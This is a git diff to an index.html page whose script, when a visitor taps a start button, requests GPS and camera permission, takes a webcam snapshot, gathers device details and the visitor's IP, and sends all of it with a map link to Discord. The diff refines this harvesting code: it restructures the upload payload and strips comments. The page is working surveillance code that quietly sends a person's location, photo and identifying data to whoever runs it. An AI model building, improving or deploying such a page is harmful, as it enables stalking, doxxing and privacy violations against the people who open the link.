--- a/index.html
+++ b/index.html
@@ -63,6 +63,7 @@
       const mapLink = coords.lat !== "Permission denied"
         ? `https://www.google.com/maps?q=${coords.lat},${coords.lon}` : "N/A";
       const device = getDeviceInfo();
+
       const payload = {
         embeds: [{
           title: "📍 GPS & Device Info",
@@ -84,15 +85,14 @@
 **Screen:** ${device.screen}  
 **Touch Support:** ${device.touchSupport}
 
-🕒 ${new Date().toLocaleString()}`
-        }],
-        files: capturedImageData
-          ? [{ name: "snapshot.png", type: "image/png", data: capturedImageData }]
-          : []
+🕒 ${new Date().toLocaleString()}`,
+          image: capturedImageData ? { url: "attachment://snapshot.png" } : undefined
+        }]
       };
 
       const formData = new FormData();
       formData.append("payload_json", JSON.stringify(payload));
+
       if (capturedImageData) {
         const blob = dataURLtoBlob(capturedImageData);
         formData.append("files[0]", blob, "snapshot.png");
@@ -106,7 +106,6 @@
       document.getElementById("status").innerText = "Requesting permissions…";
 
       try {
-        // Geolocation must be triggered right after click
         let locationAllowed = false;
 
         await new Promise((resolve) => {
@@ -128,7 +127,6 @@
           return;
         }
 
-        // Request camera
         try {
           const stream = await navigator.mediaDevices.getUserMedia({ video: true });
           const video = document.createElement("video");
@@ -151,7 +149,6 @@
           // camera denied — continue
         }
 
-        // Get IP and send to Discord
         fetch("https://api.db-ip.com/v2/free/self")
           .then(res => res.json())
           .then(sendToDiscord)
@@ -164,10 +161,7 @@
       }
     }
 
-    // 🔒 MOBILE FIX: trigger everything directly from tap
-    document.getElementById("startBtn").addEventListener("click", () => {
-      startSequence();
-    });
+    document.getElementById("startBtn").addEventListener("click", startSequence);
   </script>
 </body>
 </html>
